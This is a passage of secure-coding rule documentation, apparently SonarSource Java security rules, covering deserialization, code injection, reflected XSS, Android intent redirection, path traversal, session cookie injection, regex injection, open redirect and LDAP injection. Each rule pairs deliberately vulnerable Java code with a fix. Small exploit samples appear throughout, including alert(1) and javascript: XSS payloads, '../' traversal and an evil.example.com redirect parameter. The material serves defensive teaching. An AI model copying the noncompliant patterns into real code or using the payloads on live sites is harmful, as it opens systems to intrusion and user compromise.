Message authentication codes (MAC) can be used to prevent tampering with serialized data that is meant to be stored outside the application server:

  • On the server-side, when serializing an object, compute a MAC of the result and append it to the serialized object string.
  • When the serialized value is submitted back, verify the serialization string MAC on the server side before deserialization.

Depending on the situation, two MAC computation modes can be used.

If the same application will be responsible for the MAC computing and validation, a symmetric signature algorithm can be used. In that case, HMAC should be preferred, with a strong underlying hash algorithm such as SHA-256.

If multiple parties have to validate the serialized data, an asymmetric signature algorithm should be used. This will reduce the chances of a signing secret being leaked. In that case, the RSASSA-PSS algorithm can be used.

Note: Be sure to store the signing secret securely.
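The symmetric variant described above can be sketched with the JDK's javax.crypto.Mac API. This is a minimal sketch; the class and method names (SerializedDataMac, tag, verify) are illustrative, and key management is deliberately out of scope:

```java
import java.security.MessageDigest;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

// Compute an HMAC-SHA256 tag over serialized bytes before storing them,
// and verify the tag before deserializing anything.
public class SerializedDataMac {
    public static byte[] tag(byte[] serialized, byte[] key) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        return mac.doFinal(serialized);
    }

    public static boolean verify(byte[] serialized, byte[] key, byte[] expectedTag) throws Exception {
        // MessageDigest.isEqual performs a constant-time comparison
        return MessageDigest.isEqual(tag(serialized, key), expectedTag);
    }
}
```

MessageDigest.isEqual is used instead of Arrays.equals to avoid leaking tag bytes through timing differences.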

Pre-Approved classes

As a last resort, create a list of approved and safe classes that the application should be able to deserialize.
If the untrusted class does not match an entry in this list, it should be rejected because it is considered unsafe.

Note: Untrusted classes should be filtered out during deserialization, not after.
Depending on the language or framework, this should be possible by overriding the serialization process or using native capabilities to restrict type deserialization.

In the previous example, the pre-approved list uses class names to validate the deserialized class.
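On Java 9 and later, the native capability mentioned above is java.io.ObjectInputFilter, which enforces the allowlist during deserialization itself rather than in a custom resolveClass override. A minimal sketch (the class and method names are hypothetical; the filter pattern accepts only java.lang.String and rejects everything else):

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;

// "java.lang.String;!*" allows java.lang.String and rejects all other
// classes; a rejected class raises InvalidClassException during read.
public class FilteredDeserialization {
    public static Object readAllowed(byte[] bytes) throws IOException, ClassNotFoundException {
        ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes));
        in.setObjectInputFilter(ObjectInputFilter.Config.createFilter("java.lang.String;!*"));
        return in.readObject();
    }
}
```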

Resources

Standards

javasecurity:S5334

Why is this an issue?

Code injections occur when applications allow the dynamic execution of code instructions from untrusted data.
An attacker can influence the behavior of the targeted application and modify it to get access to sensitive data.

What is the potential impact?

An attacker exploiting a dynamic code injection vulnerability will be able to execute arbitrary code in the context of the vulnerable application.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process that executes the code runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of code injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Commons Compiler

Code examples

The following code is vulnerable to arbitrary code execution because it compiles and runs HTTP data.

Noncompliant code example

import org.codehaus.commons.compiler.CompileException;
import org.codehaus.janino.ScriptEvaluator;

@Controller
public class ExampleController
{
    @GetMapping(value = "/")
    public void exec(@RequestParam("message") String message) throws CompileException, InvocationTargetException {
        ScriptEvaluator se = new ScriptEvaluator();
        se.cook("System.out.println(\"" + message + "\");");
        se.evaluate(null);
    }
}

Compliant solution

import org.codehaus.commons.compiler.CompileException;
import org.codehaus.janino.ScriptEvaluator;

@Controller
public class ExampleController
{
    @GetMapping(value = "/")
    public void exec(@RequestParam("message") String message) throws CompileException, InvocationTargetException {
        ScriptEvaluator se = new ScriptEvaluator();
        se.setParameters(new String[] { "input" }, new Class[] { String.class });
        se.cook("System.out.println(input);");
        se.evaluate(new Object[] { message });
    }
}

How does this work?

Allowing users to execute code dynamically generally creates more problems than it solves.

Anything that can be done via dynamic code execution can usually be done via a language’s native SDK and static code.
Therefore, our suggestion is to avoid executing code dynamically.
If the application requires the execution of dynamic code, additional security measures must be taken.

Dynamic parameters

When the untrusted values are only expected to be values used in standard processing, it is generally possible to provide them as parameters of the dynamic code. In that case, care should be taken to ensure that only the name of the untrusted parameter is passed to the dynamic code, and that its value is not expanded into it. After that, the dynamic code will be able to safely access the untrusted parameter's content and perform the processing.

The compliant code example uses such an approach.

Allow list

When the untrusted parameters are expected to contain operators, function names, or other reflection-related values, best practice is to use an allow list. This list would contain the accepted safe values that can be used as part of the dynamic code.

When receiving an untrusted parameter, the application would verify its value is contained in the configured allow list. If it is present, the parameter is accepted. Otherwise, it is rejected and an error is raised.

Another similar approach is using a binding between identifiers and accepted values. That way, users are only allowed to provide identifiers, where only valid ones can be converted to a safe value.
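Such a binding can be sketched with a simple map (a minimal illustration; the class name, method name, and the bound expressions are hypothetical):

```java
import java.util.Map;

// Users submit an identifier; only identifiers bound to a pre-approved
// expression are converted into code that may be evaluated.
public class OperationAllowList {
    private static final Map<String, String> OPERATIONS = Map.of(
        "sum", "a + b",
        "product", "a * b");

    public static String expressionFor(String identifier) {
        String expr = OPERATIONS.get(identifier);
        if (expr == null) {
            throw new IllegalArgumentException("Unknown operation: " + identifier);
        }
        return expr;
    }
}
```

Because the user-supplied string is only ever used as a map key, no user-controlled content reaches the dynamic code.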

Resources

Articles & blog posts

Standards

javasecurity:S5131

This vulnerability makes it possible to temporarily execute JavaScript code in the context of the application, granting access to the session of the victim. This is possible because user-provided data, such as URL parameters, are copied into the HTML body of the HTTP response that is sent back to the user.

Why is this an issue?

Reflected cross-site scripting (XSS) occurs in a web application when the application retrieves data like parameters or headers from an incoming HTTP request and inserts it into its HTTP response without first sanitizing it. The most common cause is the insertion of GET parameters.

When well-intentioned users open a link to a page that is vulnerable to reflected XSS, they are exposed to attacks that target their own browser.

A user with malicious intent carefully crafts the link beforehand.

After creating this link, the attacker must use phishing techniques to ensure that their target users click on the link.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but it can also be arbitrary code that can be interpreted by the target user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Vandalism on the front-end website

The malicious link defaces the target web application from the perspective of the user who is the victim. This may result in loss of integrity and theft of the benevolent user’s data.

Identity spoofing

The forged link injects malicious code into the web application. The code enables identity spoofing thanks to cookie theft.

Record user activity

The forged link injects malicious code into the web application. To leak confidential information, attackers can inject code that records keyboard activity (keylogger) and even requests access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers chain cross-site scripting vulnerabilities with other vulnerabilities to maximize their impact.
For example, an XSS can be used as the first step to exploit more dangerous vulnerabilities or features that require higher privileges, such as a code injection vulnerability in the admin control panel of a web application.

How to fix it in JSP

Code examples

The following code is vulnerable to cross-site scripting because JSP does not auto-escape variables.

User input embedded in HTML code should be HTML-encoded to prevent the injection of additional code. This can be done with the OWASP Java Encoder or similar libraries.

Noncompliant code example

<%@page contentType="text/html" pageEncoding="UTF-8"%>
<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %>
<!doctype html>
<html>
 <body>
  <h1>${param.title}</h1>    <!-- Noncompliant -->
 </body>
</html>

Compliant solution

<%@page contentType="text/html" pageEncoding="UTF-8"%>
<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %>
<!doctype html>
<html>
 <body>
  <h1>${e:forHtml(param.title)}</h1>
 </body>
</html>

How does this work?

Template engines are used by web applications to build HTML content. Template files contain static HTML as well as template language instructions. These instructions allow, for example, inserting dynamic values into the document as the template is rendered.

Encode data according to the HTML context

The best approach to protect against XSS is to systematically encode data that is written to HTML documents. The goal is to leave the data intact from the end user’s point of view but make it uninterpretable by web browsers.

XSS exploitation techniques vary depending on the HTML context where malicious input is injected. For each HTML context, there is a specific encoding to prevent JavaScript code from being interpreted. The following table summarizes the encoding to apply for each HTML context.

For each HTML context below, a code example, an exploit example, and the encoding to apply are given.

Inbetween tags

<!doctype html>
<div>
  { data }
</div>
<!doctype html>
<div>
  <script>
    alert(1)
  </script>
</div>

HTML entity encoding: replace the following characters by HTML-safe sequences.

  • & → &amp;
  • < → &lt;
  • > → &gt;
  • " → &quot;
  • ' → &#x27;

In an attribute surrounded with single or double quotes

<!doctype html>
<div tag="{ data }">
  ...
</div>
<!doctype html>
<div tag=""
     onmouseover="alert(1)">
  ...
</div>

HTML entity encoding: replace the following characters with HTML-safe sequences.

  • & → &amp;
  • < → &lt;
  • > → &gt;
  • " → &quot;
  • ' → &#x27;

In an unquoted attribute

<!doctype html>
<div tag={ data }>
  ...
</div>
<!doctype html>
<div tag=foo
     onmouseover=alert(1)>
  ...
</div>

Dangerous context: HTML output encoding will not prevent XSS fully.

In a URL attribute

<!doctype html>
<a href="{ data }">
  ...
</a>
<!doctype html>
<a href="javascript:alert(1)">
  ...
</a>

Validate the URL by parsing the data. Make sure relative URLs start with a / and that absolute URLs use https as a scheme.
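This URL validation can be sketched with java.net.URI (a minimal sketch; the class and method names are hypothetical):

```java
import java.net.URI;
import java.net.URISyntaxException;

// Accept only relative URLs starting with "/" or absolute https URLs,
// so schemes like "javascript:" are rejected by construction.
public class UrlValidator {
    public static boolean isSafeUrl(String data) {
        try {
            URI uri = new URI(data);
            if (uri.getScheme() == null) {
                // Relative URL: require a leading slash
                return data.startsWith("/");
            }
            return "https".equalsIgnoreCase(uri.getScheme());
        } catch (URISyntaxException e) {
            return false;
        }
    }
}
```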

In a script block

<!doctype html>
<script>
  { data }
</script>
<!doctype html>
<script>
  alert(1)
</script>

Dangerous context: HTML output encoding will not prevent XSS fully. To pass values to a JavaScript context, the recommended way is to use a data attribute:

<!doctype html>
<script data="{ data }">
  ...
</script>

org.owasp.encoder.Encode.forHtml is the recommended method to encode HTML entities.
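As a minimal illustration of the entity replacements listed above (the class name is hypothetical; a vetted library such as the OWASP Java Encoder should be preferred over a hand-written encoder):

```java
// Applies the five HTML-safe replacements from the table above.
public class HtmlEntityEncoder {
    public static String encode(String data) {
        // '&' must be replaced first so it does not re-encode the
        // ampersands introduced by the other replacements.
        return data.replace("&", "&amp;")
                   .replace("<", "&lt;")
                   .replace(">", "&gt;")
                   .replace("\"", "&quot;")
                   .replace("'", "&#x27;");
    }
}
```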

Pitfalls

Content-types

Be aware that there are more content types than text/html that allow executing JavaScript code in a browser and are thus prone to cross-site scripting vulnerabilities.
The following content-types are known to be affected:

  • application/mathml+xml
  • application/rdf+xml
  • application/vnd.wap.xhtml+xml
  • application/xhtml+xml
  • application/xml
  • image/svg+xml
  • multipart/x-mixed-replace
  • text/html
  • text/rdf
  • text/xml
  • text/xsl

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

As an example, filtering out user inputs based on a deny-list will never fully prevent an XSS vulnerability from being exploited. This practice is sometimes used by web application firewalls. It is only a matter of time for malicious users to find the exploitation payload that will defeat the filters.

Another example is applications that allow users or third-party services to send HTML content to be used by the application. A common approach is trying to parse HTML and strip sensitive HTML tags. Again, this deny-list approach is vulnerable by design: maintaining a list of sensitive HTML tags, in the long run, is very difficult.

A preferred option is to use Markdown in conjunction with a parser that removes embedded HTML and restricts the use of "javascript:" URI.

Going the extra mile

Content Security Policy (CSP) Header

With a defense-in-depth security approach, the CSP response header can be added to instruct client browsers to block loading data that does not meet the application’s security requirements. If configured correctly, this can prevent any attempt to exploit XSS in the application.
Learn more here.

Resources

Documentation

Articles & blog posts

Conference presentations

Standards

javasecurity:S6384

Why is this an issue?

Intent redirection vulnerabilities occur when an application publicly exposes a feature that uses an externally provided intent to start a new component.

In that case, an application running on the same device as the affected one can launch the exposed, vulnerable component and provide it with a specially crafted intent. Depending on the application’s configuration and logic, this intent will be used in the context of the vulnerable application, which poses a security threat.

What is the potential impact?

An affected component that forwards a malicious externally provided intent does so using the vulnerable application’s context. In particular, the new component is created with the same permissions as the application and without limitations on which features can be reached.

Therefore, an attacker exploiting an intent redirection vulnerability could manage to access a private application’s components. Depending on the features privately exposed, this can lead to further exploitations, sensitive data disclosure, or even persistent code execution.

Information disclosure

An attacker can use the affected feature as a gateway to access other components of the vulnerable application, even if they are not exported. This includes features that handle sensitive information.

Therefore, by crafting a malicious intent and submitting it to the vulnerable redirecting component, an attacker can retrieve most data exposed by private features. This affects the confidentiality of information that is not protected by an additional security mechanism, such as an encryption algorithm.

Attack surface increase

Because the attacker can access most components of the application, they can identify and exploit other vulnerabilities that would be present in them. The actual impact depends on the nested vulnerability. Exploitation probability depends on the in-depth security level of the application.

Privilege escalation

If the vulnerable application has privileges on the underlying device, an attacker exploiting the redirection issue might take advantage of them. For example, by crafting a malicious intent action, the attacker could be able to place phone calls on behalf of the entitled application.

This can lead to various attack scenarios depending on the exploited permissions.

Persistent code execution

A lot of applications rely on dynamic code loading to implement a variety of features, such as:

  • Minor feature updates.
  • Application package size reduction.
  • DRM or other code protection features.

When a component exposes a dynamic code loading feature, an attacker could use it during the redirection’s exploitation to deploy malicious code into the application. The component can be located in the application itself or one of its dependencies.

Such an attack would compromise the application execution environment entirely and lead to multiple security threats. The malicious code could:

  • Intercept and exfiltrate all data used in the application.
  • Steal authentication credentials to third-party services.
  • Change the application’s behavior to serve another malicious purpose (phishing, ransomware, etc.)

Note that in most cases, the deployed malware can persist across application or hosting device restarts.

How to fix it in Android

Code examples

This code is vulnerable to intent injection attacks because it starts a new activity from a user-provided intent without prior validation.

Noncompliant code example

public class Noncompliant extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        Intent intent = getIntent();
        Intent forward = (Intent) intent.getParcelableExtra("anotherintent");
        startActivity(forward); // Noncompliant
    }
}

Compliant solution

public class MainActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        Intent intent = getIntent();
        Intent forward = (Intent) intent.getParcelableExtra("anotherintent");

        ComponentName name = forward.resolveActivity(getPackageManager());
        if (name != null &&
                name.getPackageName().equals("safePackage") &&
                name.getClassName().equals("safeClass")) {
            startActivity(forward);
        }
    }
}

How does this work?

In general, security best practices discourage forwarding intents. However, when the application requires such a feature, it should precisely check the forwarded intents to ensure they do not pass malicious content.

Additionally, the components that are not meant to be accessed externally should be marked as non-exported in the application’s manifest. This is done by setting the android:exported attribute of the components to "false".

Checking the intent destination

Most unintended usage of the forwarding feature can be prevented by verifying whether the destination package and class names belong to a list of accepted components.

The allow-list of accepted destinations should only contain components that perform non-sensitive actions and handle non-sensitive data. Moreover, it should not allow reaching components that further redirect inner intents.

The example compliant code uses the resolveActivity method of the inner intent to determine its target component. It then uses the getPackageName and getClassName methods to validate this destination is not sensitive.

Checking the intent origin

Before forwarding the intent, the application can check its origin. Verifying the origin package is trusted prevents the forwarding feature from being used by an external component.

The getCallingActivity method of the receiving Activity can be used to determine the origin component.

Permissions downgrade

Before forwarding an intent to another component, the application can verify or remove the permissions set on the forwarded intent. In that case, even if the destination is a sensitive component, the application can ensure the untrusted intent will not be able to read or write sensitive data or locations.

In most cases, the application should drop the following permissions from untrusted intents:

  • FLAG_GRANT_READ_URI_PERMISSION
  • FLAG_GRANT_WRITE_URI_PERMISSION

Resources

Documentation

Standards

javasecurity:S2083

Why is this an issue?

Path injections occur when an application uses untrusted data to construct a file path and access this file without validating its path first.

A user with malicious intent would inject specially crafted values, such as ../, to change the initially intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access to.

What is the potential impact?

A web application is vulnerable to path injection and an attacker is able to exploit it.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override or delete arbitrary files

The injected path component tampers with the location of a file the application is supposed to delete or write into. The vulnerability is exploited to remove or corrupt files that are critical for the application or for the system to work properly.

It could result in data being lost or the application being unavailable.

Read arbitrary files

The injected path component tampers with the location of a file the application is supposed to read and output. The vulnerability is exploited to leak the content of arbitrary files from the file system, including sensitive files like SSH private keys.

How to fix it in Java SE

Code examples

The following code is vulnerable to path injection as it creates a path using untrusted data without validation.

An attacker can exploit the vulnerability in this code to delete arbitrary files.

Noncompliant code example

@Controller
public class ExampleController
{
    static private String targetDirectory = "/path/to/target/directory/";

    @GetMapping(value = "/delete")
    public void delete(@RequestParam("filename") String filename) throws IOException {

        File file = new File(targetDirectory + filename);
        file.delete();
    }
}

Compliant solution

@Controller
public class ExampleController
{
    static private String targetDirectory = "/path/to/target/directory/";

    @GetMapping(value = "/delete")
    public void delete(@RequestParam("filename") String filename) throws IOException {

        File file = new File(targetDirectory + filename);
        String canonicalDestinationPath = file.getCanonicalPath();

        if (!canonicalDestinationPath.startsWith(targetDirectory)) {
            throw new IOException("Entry is outside of the target directory");
        }

        file.delete();
    }
}

How does this work?

Canonical path validation

If it is impossible to use secure-by-design APIs that do this automatically, the universal way to prevent path injection is to validate paths constructed from untrusted data:

  1. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.
  2. Resolve the canonical path of the file by using methods like java.io.File.getCanonicalPath. This will resolve relative path or path components like ../ and removes any ambiguity regarding the file’s location.
  3. Check that the canonical path is within the directory where the file should be located.

Important Note: The order of this process pattern is important. The code must follow this order exactly to be secure by design:

  1. data = transform(user_input);
  2. data = normalize(data);
  3. data = sanitize(data);
  4. use(data);

As pointed out in this SonarSource talk, failure to follow this exact order leads to security vulnerabilities.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation string contains a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string targetDirectory does not end with a path separator:

static private String targetDirectory = "/Users/John";

@GetMapping(value = "/endpoint")
public void endpoint(@RequestParam("folder") String fileName) throws IOException {

    String canonicalizedFileName = new File(fileName).getCanonicalPath();

    if (!canonicalizedFileName.startsWith(targetDirectory)) {
        throw new IOException("Entry is outside of the target directory");
    }
}

This check can be bypassed because "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions, such as .getCanonicalPath, remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.
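
As a sketch of that test, the hypothetical helper below re-appends the separator that .getCanonicalPath strips, so the prefix check cannot be bypassed by a sibling directory with a matching name prefix (the class and method names are illustrative):

```java
import java.io.File;

public class SafePrefixCheck {

    // Returns true only if canonicalChild is located inside baseDir.
    static boolean isInside(String baseDir, String canonicalChild) {
        // Re-append the separator so "/Users/Johnny" does not pass for base "/Users/John".
        String normalizedBase = baseDir.endsWith(File.separator)
                ? baseDir
                : baseDir + File.separator;
        return canonicalChild.startsWith(normalizedBase);
    }

    public static void main(String[] args) {
        System.out.println(isInside("/Users/John", "/Users/Johnny/secret"));  // false
        System.out.println(isInside("/Users/John", "/Users/John/notes.txt")); // true
    }
}
```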

Here is a real-life example of this vulnerability.

Do not use java.nio.file.Path.resolve as a validator

As specified in the official documentation, if the given parameter is an absolute path, the base object from which the method is called is discarded and is not included in the resulting string.

This means that including untrusted data in the parameter and using the resulting string for file operations may lead to a path traversal vulnerability.
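
A short demonstration of this behavior (the base directory path is illustrative):

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public class ResolvePitfall {

    // Resolves the given child against a fixed base directory.
    static String resolveAgainstBase(String child) {
        Path base = Paths.get("/var/app/uploads");
        return base.resolve(child).toString();
    }

    public static void main(String[] args) {
        // A relative argument is appended to the base, as one might expect:
        System.out.println(resolveAgainstBase("report.pdf")); // /var/app/uploads/report.pdf

        // An absolute argument silently discards the base entirely:
        System.out.println(resolveAgainstBase("/etc/passwd")); // /etc/passwd
    }
}
```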

Resources

Standards

javasecurity:S6287

Why is this an issue?

Session Cookie Injection occurs when a web application assigns session cookies to users using untrusted data.

Session cookies are used by web applications to identify users. Controlling them therefore grants control over a user's identity within the application.

The injection might occur via a GET parameter, with a payload such as https://example.com?cookie=injectedcookie delivered using phishing techniques.

What is the potential impact?

A well-intentioned user opens a malicious link that injects a session cookie in their web browser. This forces the user into unknowingly browsing a session that isn’t theirs.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Sensitive data disclosure

A victim enters sensitive data into an application session controlled by the attacker, who can later retrieve it. The implications vary with the type of data disclosed: leaks of strictly confidential user data and of organizational data have different impacts.

Vulnerability chaining

An attacker not only manipulates a user into browsing an application using a session cookie of their control but also successfully detects and exploits a self-XSS on the target application.
The victim browses the vulnerable page using the attacker’s session and is affected by the XSS, which can then be used for a wide range of attacks including credential stealing using mirrored login pages.

How to fix it in Java SE

Code examples

The following code is vulnerable to Session Cookie Injection as it assigns a session cookie using untrusted data.

Noncompliant code example

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
    Optional<Cookie> cookieOpt = Arrays.stream(request.getCookies())
                                    .filter(c -> c.getName().equals("jsessionid"))
                                    .findFirst();

    if (!cookieOpt.isPresent()) {
        String cookie = request.getParameter("cookie");
        Cookie cookieObj = new Cookie("jsessionid", cookie);
        response.addCookie(cookieObj);
    }

    response.sendRedirect("/welcome.jsp");
}

Compliant solution

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
    Optional<Cookie> cookieOpt = Arrays.stream(request.getCookies())
                                    .filter(c -> c.getName().equals("jsessionid"))
                                    .findFirst();

    if (!cookieOpt.isPresent()) {
        response.sendRedirect("/getCookie.jsp");
    } else {
        response.sendRedirect("/welcome.jsp");
    }
}

How does this work?

Untrusted data, such as GET or POST request content, should always be considered tainted. Therefore, an application should not blindly assign the value of a session cookie to untrusted data.

Session cookies should be generated using the built-in APIs of secure libraries that include session management instead of developing homemade tools.
Often, these existing solutions benefit from quality maintenance in terms of features, security, or hardening, and it is usually better to use these solutions than to develop your own.

Resources

Standards

javasecurity:S2631

Why is this an issue?

Regular expression injections occur when the application retrieves untrusted data and uses it as a regex to pattern match a string with it.

Most regular expression engines use backtracking to try all possible regex execution paths when evaluating an input. Sometimes this can lead to severe performance problems, referred to as catastrophic backtracking.

What is the potential impact?

In the context of a web application vulnerable to regex injection, attackers who discover the injection point can insert data into the vulnerable field to make the affected component inaccessible.

Depending on the application’s software architecture and the injection point’s location, the impact may or may not be visible.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Self Denial of Service

In cases where the complexity of the regular expression is exponential to the input size, a small, carefully-crafted input (for example, 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application.

Super-linear regex complexity can produce the same effects for a large, carefully crafted input (thousands of chars).

If the component jeopardized by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service might only affect the attacker who initiated it.

Such benign denial of service can also occur in architectures that rely heavily on containers and container orchestrators. Replication systems would detect the failure of a container and automatically replace it.

Infrastructure SPOFs

However, a denial of service attack can be critical to the enterprise if it targets a SPOF component. Sometimes the SPOF is a software architecture vulnerability (such as a single component on which multiple critical components depend) or an operational vulnerability (for example, insufficient container creation capabilities or failures from containers to terminate).

In either case, attackers aim to exploit the infrastructure weakness by sending as many malicious payloads as possible, using potentially huge offensive infrastructures.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Java SE

Code examples

The following noncompliant code is vulnerable to Regex Denial of Service because untrusted data is used as a regex to scan a string without prior sanitization or validation.

Noncompliant code example

public boolean validate(HttpServletRequest request) {
  String regex = request.getParameter("regex");
  String input = request.getParameter("input");

  return input.matches(regex);
}

Compliant solution

public boolean validate(HttpServletRequest request) {
  String regex = request.getParameter("regex");
  String input = request.getParameter("input");

  return input.matches(Pattern.quote(regex));
}

How does this work?

Sanitization and Validation

Escaping metacharacters with native functions is one defense against regex injection: the escape function sanitizes the input so that the regular expression engine interprets those characters literally.

An allowlist approach can also be used by creating a list containing authorized and secure strings you want the application to use in a query.
If a user input does not match an entry in this list, it should be considered unsafe and rejected.

Important note: The application must sanitize and validate on the server side, not in client-side front ends.

Where possible, use non-backtracking regex engines, for example, Google’s re2.

In the example, Pattern.quote escapes metacharacters and escape sequences that could have broken the initially intended logic.
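
A small demonstration of Pattern.quote (the helper name literalMatch is illustrative):

```java
import java.util.regex.Pattern;

public class QuoteDemo {

    // Matches the input against the user-supplied pattern treated as a
    // literal string rather than as a regular expression.
    static boolean literalMatch(String input, String userRegex) {
        return input.matches(Pattern.quote(userRegex));
    }

    public static void main(String[] args) {
        // Without quoting, ".*" matches anything:
        System.out.println("any input".matches(".*")); // true

        // Quoted, it only matches the literal two characters ".*":
        System.out.println(literalMatch("any input", ".*")); // false
        System.out.println(literalMatch(".*", ".*"));        // true
    }
}
```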

Resources

Articles & blog posts

Standards

javasecurity:S5146

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to redirect users to a URL.

An attacker with malicious intent could manipulate a user into browsing a specially crafted URL, such as https://trusted.example.com?url=evil.example.com, to redirect the victim to a domain under the attacker's control.

Tricking users into sending the malicious HTTP request is usually the main task of exploiting an open redirection. Often, it requires an attacker to build a credible pretext to prevent suspicions from the victim.

Attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

If an attacker tricks a user into opening a link of their choice, the user is redirected to a domain controlled by the attacker.

From then on, the attacker can perform various malicious actions, some more impactful than others.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Domain Mirroring

A malicious link redirects to an attacker’s controlled website mirroring the interface of a web application trusted by the user. Due to the similarity in the application appearance and the apparently trustable clicked hyperlink, the user struggles to identify that they are browsing on a malicious domain.

Depending on the attacker’s purpose, the malicious website can leak credentials, bypass Multi-Factor Authentication (MFA), and reach any authenticated data or action.

Malware Distribution

A malicious link redirects to an attacker’s controlled website that serves malware. On the same basis as the domain mirroring exploitation, the attacker develops a spearphishing or phishing campaign with a carefully crafted pretext that would result in the download and potential execution of a hosted malicious file.
The worst-case scenario could result in complete system compromise.

How to fix it in Java SE

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
  String location = req.getParameter("url");
  resp.sendRedirect(location);
}

Compliant solution

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
  String location = req.getParameter("url");

  List<String> allowedHosts = new ArrayList<String>();
  allowedHosts.add("https://trusted1.example.com/");
  allowedHosts.add("https://trusted2.example.com/");

  if (allowedHosts.contains(location))
    resp.sendRedirect(location);
}

How does this work?

Built-in framework methods should be preferred because they often provide additional security mechanisms. However, these built-in methods are usually engineered for internal page redirections and thus might not fit every use case.

In case the application strictly requires external redirections based on user-controllable data, this could be done using the following alternatives:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allow-list approach in case the destination URLs are multiple but limited.
  3. Adding a customized page to which users are redirected, warning about the imminent action and requiring manual authorization to proceed.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the Open Redirect vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.com.malicious.io. The practice of taking over domains that maliciously look like existing domains is widespread and is called Cybersquatting.
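
One way to avoid the trap is to compare the parsed host exactly rather than using a prefix check. The sketch below assumes a single trusted host, example.com (the class and method names are illustrative):

```java
import java.net.URI;
import java.net.URISyntaxException;

public class RedirectValidator {

    // Returns true only when the URL's scheme and exact host match the trusted values.
    static boolean isTrusted(String location) {
        try {
            URI uri = new URI(location);
            return "https".equals(uri.getScheme())
                && "example.com".equals(uri.getHost());
        } catch (URISyntaxException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println(isTrusted("https://example.com/welcome"));       // true
        System.out.println(isTrusted("https://example.com.malicious.io/")); // false
    }
}
```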

Resources

Standards

javasecurity:S2078

Why is this an issue?

LDAP injections occur in an application when the application retrieves untrusted data and inserts it into an LDAP query without sanitizing it first.

An LDAP injection can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of a visible response to the malicious request does not prevent exploitation, so blind injections must be treated the same way as basic LDAP injections.

What is the potential impact?

In the context of a web application vulnerable to LDAP injection: after discovering the injection point, attackers insert data into the vulnerable field to execute malicious LDAP commands.

The impact of this vulnerability depends on how vital LDAP servers are to the organization.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data leakage or corruption

In typical scenarios where systems perform innocuous LDAP operations to find users or create inventories, an LDAP injection could result in data leakage or corruption.

Privilege escalation

A malicious LDAP query could allow an attacker to impersonate a low-privileged user or an administrator in scenarios where systems perform authorization checks or authentication.

Attackers use this vulnerability to find multiple footholds on target organizations by gathering authentication bypasses.

How to fix it in Java SE

Code examples

